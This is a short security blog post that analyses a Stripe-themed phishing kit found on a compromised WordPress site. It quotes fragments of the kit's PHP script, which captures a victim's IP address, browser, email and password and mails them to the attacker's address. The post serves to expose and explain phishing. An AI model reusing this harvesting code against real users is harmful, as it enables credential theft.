hxxp://bitadze[.]ge/wp-includes/
The site was still wide open so you could view the http.zip file and in particular under the stripe phish the tfo.php file which is a good example of visibility behind the scenes to see what an attacker is doing with your phished credentials after you enter your data in and click submit on their malicious site
As you can see the attacker grabs your ip address
$ip = $_SERVER['REMOTE_ADDR'];
What browser you're using
$useragent = $_SERVER['HTTP_USER_AGENT'];
Your email & password
$message .= "EMAIL : ".$_POST['1KDL23']."\n";
$message .= "PASSWORD : ".$_POST['FZ32FEZ2345']."\n";
and sends it to himself
$send="fastpay147@gmail.com";
More about neonprimetime
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- DOM XSS 101 Walk-Through
- An Invoice email and a Hot mess of Java
Top Github Contributions
Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.
No comments:
Post a Comment